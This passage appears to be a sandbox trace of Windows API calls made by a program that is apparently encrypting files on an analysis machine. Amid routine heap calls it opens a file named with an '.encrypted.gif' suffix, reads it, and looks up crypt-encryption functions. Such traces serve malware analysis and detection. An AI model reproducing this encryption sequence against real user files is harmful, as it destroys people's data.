lpMsg=0x6aed6c) returned 0 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.679] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.680] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu")) returned 0x10 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.681] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\hgd17pyt.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.682] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0030.682] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.682] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0030.682] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.683] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.683] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0xbf70, lpOverlapped=0x0) returned 1 [0030.685] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbf70) returned 0x89ffb8 [0030.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbf70) returned 0x8abf30 [0030.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.687] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbf70) returned 0x89ffb8 [0030.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.688] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.688] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.688] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbf70) returned 0x89ffb8 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0030.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0030.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889688 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbf70) returned 0x8b7ea8 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.690] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.690] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.690] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0030.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da298 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.691] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.691] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.692] RtlAllocateHeap 